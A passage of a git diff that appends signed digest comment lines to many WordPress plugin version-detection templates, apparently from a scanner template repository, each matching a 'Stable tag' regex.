b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ace..ef8fdc7f8eb 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c02db1e1dc9c5c31fb702724b74efa0c161dca561308c0bc05b25f73b5d35c50022100999fab0545c5cbc473525b5347b14b7273b337465d47c752e2743617d82fd805:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736fd..e9d53076618 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210085973eccb0528762e742261706b0636f3c90f97b6caf73fff8ab81dfc8b237dd022100b11747e1e6fdf09855145438ee3719bbb957919e4185ef96b6dc5a0b2f59f9ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b24789..48179726ca5 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fd3e5d6495c9353564f8bd039717cfec1c8bcd1cc355aaa1185502f09e09bf8c02210081fc3b5f5be84702592914dac5bc98ff8c063610a0068b79f6261c005bc166bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6d..ed865d06bde 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d41282ec81ef9258c5c903b819c479f89c91c5b8458835c8e1a10547f6689418022100c4f4aad9e19c2b7319ac504e24cb64597fe515d782175a6d5a237c1ede2c9b74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d578..f3ba73cdfc2 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205a1e31d192f32a57be2f88c07dead074782e7e897b3809b3d4d0c230971be58202206fd7a5783ed16d293cd5c0eb56397165534bf87a77bdd68301e14f467a58f681:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a90..aca9ab4ee34 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100834e309fee6b38ad469ba1bb6a5cf72f9f0df407fe2dcf6f9945f52f20a9bdcf022100dd157196036f4d6a41948cfd77decc887318e50b81c8d1ea0e090b6638f8c7a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415d..767938eb9c0 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022024bcc4bcb7ae7ed9474052942dcb8fbb4e23c2ff023fcb3e9bd70c77126e5c5502201e8516e3f7b5dfb97ed0f074a4059e7b1d34916ca5aec02af232955b03d9075d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d2..925e533ec7b 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022064f5b57a253fc8694c776dd57ea50d232f9ecf332489b97d086b855b7a844b1e022030e63d881654934517cdea9b57e82770711ab777987b65472cba414fc2a86d27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03c..dc70eadd43f 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207b8215f9a920ef042d984dfbef99970e2fe3f592f05904510b00b46391c7b1e20221008af77589464339c020d0956104c71388ae09d8fde6c4ddbe551ec6443d9d73d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9c..c25aebea7d0 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008af1cea4f7f716f33a7f99c3442ad65eeab25946e2b9e66638f2faab1ba427cc0221008d9efec8129e7471a282b135f7d8c32efcc80690fdb7787849398e2fdd563e98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc670..987178ebe9d 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009aed91a1a7bafe89496aec46a0b0b0a3c74e84d6326ed00a2182594ce806750302204f2c720a0d5871a182d28de866fd549cfdd253574fe4e87045e52778bc704156:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde5..0869974979a 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220323af72842f53b591b5fe909644d6033bf57cb6568276252a3ac4392c04910270220534a33ea4b8b579862cc0025c31a511d6536c9f4006404336041b07510c3ab0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7d..db51d90833b 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200fb657a278f5cec6f184504864956629dbb95315c3d408a6e7a930d129debeaa022100b942da3e0147f8ac616b58ed0cb024e411b0f4c688f64074711e2242bbfb1f2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea24..45494721f76 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cb9570b0c0fcf1cdc9d2df8d18704006f8236f05f4eb1fc6caa30208c225070902201514380ca01da0dd074678dddf841f2eeedd8c381736f378bc9deae7238ccc03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c7..79a5a833933 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022072f8673849fce41dc24e7b779a09b59f033eb8354eb4040750ff7e1039378be3022100e663678da320fefdf903317aabcb9f00fd4bd33e2f655a43f72dde521c3efdc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f64..bad78e7a0c8 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022053e2cad3a17e0cd229aee0ffb49283ad7fba15510651fc1f74377e2f0ee3e9dd022100b98644ebe15097d12c123fbc9092911427efaba878f38b771b80ee5d6576e522:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff4..1cbc9102758 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ef747795c419b4dc2eab45ad22ff8afd8c00f8961ada087559704b443f0f40320221008f51d6d8d888e76dd0d01ac826f4147eed532615f1a2ecbecca9cebcf306a801:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1c..a0060733544 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220575f3da25e08e7359033e37696568d5ae5cfeb53e048890f16ac9b551ea964d5022100f021c44001b9c753bd6bc5c615fd951c4be9bae4ba8626303203f5610cb0547f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751b..a8fcb984f7a 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009d097ed0d67e34d98eb0d9d5ae81c31ffa709551834e3d09ddd48fbdee61a2bd0220128bd91e2c0ecce4cc5204cf433fb1ee5f1643fb4bbf07ef62566201fdb8a8c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e47..0bcc326e252 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d71ae447da0acaa3d47d9c793f110de18ddfd78d0beca6e6dd9256cec60c2cab022100adc8f618cb95625032f34b257bc96546d16e2474fa277ec1fa625c0332f8bba6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb76..f789f0c67b9 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cb8c4a3528ca69521db99f4482068d769fa7460f2a665311a238ff64057a70410221008ec0bcf392cc11b84ead7863869594d57531903d7ea133b5d83bf4400a3d68c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e49..bc4a3007563 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210089c8db51a0d64802c7cd64668c4a63a6b077d1f0e3b01a15b6cd914477c8c1e3022100d5e76ba20bcda6ec5181ee77d484e7419728d9c7d722fc7f18515cf89b804fc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283de..57e70807206 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200412383001a535dbe1db8b9a2e1a4f8ffdc4be55bc3aa2f6f17411cf69b847c6022100f9c2df846212fa96c3327eec234c6c758c105af874cd3f183b400e980784b6e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3e..8e5c4fd9c7c 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022012846a7ac2c5b55c33327a4a6a175615ef328cbd575c5211c0721755ff4fee31022067bf4e3c926c63b5a33a395f78eebc7606310993ff724ba0e29e67b4abca238b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd44..4fb6384545f 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b410f16998b2183ce860ee15dae98f833d09d3d830cec1ecee54c715eef69e64022067dad85683cac910313432e5803df84e6fed7735c5fa3c5d26533b29bbd0cd7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74c..630adc7262e 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202931e718a7ed1fe5ce3127eaa63b2bce379ed425f69a8f25004c446fd92144910221009b3a76b580bd9a9667c12e67bfba85aac2ed5e0bff2b5f21a5185e7139bf6cc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074c..62702f0e634 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206e7b117dd8793a3472b6327f913102a0275e3ec3fe1befe86dcc68acf9d285d802204a0e0769802354ef4a70e8a6d58c928d30655d5cce222c6fc79d13cfe1293ba2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5eb..816209079d2 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205245649163a47e5a199084ff73150f3a6ff4617dc8b4d4925134e53494e707a3022100f47c84764cf087468ac853a85eb51b280fd89313776e18e3708caef85a8b7fdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae30..d41e2129553 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f8d7c906c2e9cca88af3c58c7d8ecabb94153310039d17dde1bfdc3375d682c2022055a100dcfbcb33ef8d108bf902110fcf9fa9c02dd0d4150bea7bd0558a1e1465:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27a..dfbe49cb14d 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200690eb466dedf9e3c3cdf3e9b886ae03f0312b33b0a0479b3c99caa36929b32d0221009880f3409e877cb8c41b7b6506d765b0391323f4d0dc99e05debe8b0f258bf44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index eda1d27f047..ebb53c85984 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d1b4a6250a03bcb918a374d7eae1b6764426c43e5cc0fb0dc8b409cc1f8b7097022036d7dc1e5a181cff7497c008ded97216ffb345e0d5bd6de0bf136bb689ebdc5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f5..74c5894bab2 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d10292f8ed8a9f3b5a08005b72d2bf763cf3e4b606b0f420c2a0fccbae89810e02201dcb72810467d70c4b3c4721475cfe5afef575faeb4e5044da542ec15abfc509:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea697..f2d56b72baf 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022056b77d4e5b296d848bdc3b402a9f8c2bd5b52d39cb9b3016908bf2ea6149a06d0220557817d9290e2c8beb217389166eb727a6aaf76443ef6e8c1ba3c2e816cc5583:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce85..bfa693f52e6 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c2296541e1d47a5b6aa5966e6559ae60f0f540ad3d2a3ac01a4d626c2ff06e540221008261a1cfce7492c3948b74620bb3bf6ec655f064f58764ef8407c81b64deab71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1c..7bfcca0ee0b 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206753cf1d015adc4ac187628342db1dfe7b4daa2c40a6307fbc7949d2783c364002200660cc2a63c5ad8928f4dcf656e38839407afe3fc68458a595f94aaa50f5ead5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2b..490a1fbbdae 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022059bd3e8555ffe86954cf660bff282cde3d54e935322b7baa22236e03ea1efff0022100a55d5775a9b5195757a552bdf8bc4c640413ee8a9cfa838cc859f8d0ae5d7cb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0c..99c5cdc49a3 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022017136fc7f06b1163c68c792dbaab177f2806203b358126f763ef646cf890d543022100f7c1bf824da9d96a796197ef0da650f0cff03dc557da33de00ca9e0ed4a115f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca7..fbe764126e8 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f6b837ca9a54dce77a5e4f470b4fc01e71b2d3e6f3f97a03fecfadef6b856f03022075c67fc42cd86216ecb04d1a628f568df7583e18894d9954a04e64d2491a57db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5dfe..6e12cc5f562 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d1301a67a640666dda200e8c6d1c331e055438476109a6549c4f6c975523f0b8022100c3896e87d77708d12db896f1e77eefda1852f915064152163672429bbc11d677:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f7..7dee749ead4 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203246d920e5683a41278f0b83b00471aaac66fd7746a75c4b00e7ca112704e8d00221009b77c445c843f7ea219d05643aaacd80971841fbbab5c16e6ea2a30e8bd1d25a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e7..5315ffae17b 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203e162dfb9aa028f8793e4a28bfd7f2ae51f1dbaafef21b2adb5b54e765209116022027aa6376a2e815336a21cc6d0e3b86013933fb68297fddad67c91aea5e2fa9a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e3..aba93bde64f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022003c99003c78431ad6fdc1d3da3e8da386d99abbbf008bf60e5331f89ef7289ed022100d7d34e2f7a529718cb345108636db17fef60b06d865d165ee62b00c1071bd6d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4fa..35c6aca7378 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b417f3148399a19a5b02d0cd525176cae74be6ef464abd6593b08730a34801f602203c7819f302c992909681d2306edca21ef6c8d0e1fbab63d928e99eb4eac9add1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e9..a714a83cf58 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205f0db8c3d5b0bfef644d7c6bed9eb618a8fd0ef5f3ede6c2a154a124175820ef02207bc66d945596af83b8d84732059eb63eb00d29b0506d99a7247ce16c5fa74452:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f96..0f8e65d595b 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022024ceef3a175174bb5a046ac70f5a3d026f751081ba6252a437b65bfc393ada7b02201ee73ce20782da5763f0e702b2901a9b42c583405a0683cc0f22f8bd694e53a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a27..e606da27df2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d3df6f8875b86d322fde441d9e9bf1ac8147d3fc2e16dd7d6ba5d7bc5b01e4f302203c2b0f34cd288a039a7876fcfde43c707f95cdd262035bad18765171ddcefc55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e45..3c4b8d7233b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 